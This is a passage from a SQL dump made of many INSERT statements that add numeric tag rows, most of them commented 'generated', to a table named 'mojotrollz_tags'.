`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177267, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177268, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177269, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177270, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177271, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177272, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177273, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177274, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177275, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177276, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177277, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177278, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177279, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177280, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177281, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177284, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177285, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177286, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177287, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177287, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177287, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177287, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177288, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177289, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177292, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177292, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177293, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177293, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177307, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177365, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177366, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177367, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177368, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177369, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177370, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177371, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177372, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177373, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177374, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177375, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177376, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177377, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177378, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177379, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177380, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177381, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177382, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177383, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177384, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177385, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177387, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177387, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177387, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177387, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177388, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177397, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177398, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177399, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177400, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177404, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177405, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177405, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177406, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177406, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177408, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177408, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177409, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177409, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177410, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177410, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177411, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177411, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177412, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177412, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177413, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177413, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177417, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177444, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177464, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177484, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177484, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177485, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177485, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177490, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177491, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177494, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177495, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177496, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177497, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177498, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177499, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177500, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177501, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177502, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177503, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177504, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177505, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177506, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177507, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177508, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177509, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177510, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177511, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177512, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177513, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177514, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177524, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177525, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177544, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177604, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177606, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177644, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177665, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177668, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177673, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177675, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177677, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177684, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177706, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177724, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177725, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177726, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177747, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177750, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177784, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177785, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177786, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177787, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177789, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177790, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177791, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177792, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177793, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177794, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177804, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177805, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177806, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177807, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177807, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177807, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177807, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177808, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177808, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177808, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177808, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177824, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177824, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177824, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177824, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177884, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177905, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177926, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177927, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177928, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177929, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177964, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177964, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177984, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177984, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177984, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177984, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177985, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177985, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177985, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177985, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177986, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177986, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177986, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177986, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177987, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177987, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177987, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177987, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177988, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177988, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177988, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177988, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177989, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177989, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177989, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177989, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177990, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177990, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177990, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177990, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177991, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177991, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177991, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177991, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177992, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177992, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177992, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177992, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177993, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177993, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177993, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177993, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177994, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177994, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177994, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177994, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177995, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177995, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177995, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177995, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177996, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177996, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177996, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177996, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177997, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177997, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177997, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177997, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177998, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177998, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177998, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177998, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177999, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177999, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177999, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177999, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178000, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178000, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178000, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178000, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178001, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178001, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178001, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178001, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178002, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178002, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178002, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178002, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178003, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178003, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 